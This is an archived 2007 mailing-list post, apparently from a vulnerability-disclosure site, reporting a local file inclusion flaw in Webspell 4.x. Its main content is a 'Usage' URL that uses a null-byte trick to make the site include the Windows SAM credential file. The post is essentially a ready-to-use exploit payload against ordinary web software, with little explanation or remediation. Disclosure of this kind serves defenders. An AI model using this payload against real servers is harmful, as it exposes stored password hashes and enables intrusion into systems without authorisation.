Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Minb Is Not A Blog default password directory

[Aria-Security] Image Racer SearchResults.asp SQL INJECTION vuln.

PHMe CMS 0.0.2 local File Include Vulnerabilitiy

SEC Consult SA-20070722-0 :: Remote command execution in Joomla! CMS

From:	f00_(at)_nowayyyy.de <f00_(at)_nowayyyy.de>
Date:	23.07.2007
Subject:	Webspell 4.x Local File Inclusion

####-[ muH ]-####
#
#$Title: Webspell 4.x Local File Inclusion (Win)
#
#$Damage Factor: Medium - High
#
#$Requires: Win Box & Php Supporting %00
#
#$Discovered by   muH
#
###############
#
#$Usage: http://server.com/index.php?site=c:\windows\repair\sam%00
#
# # # # # # # # # #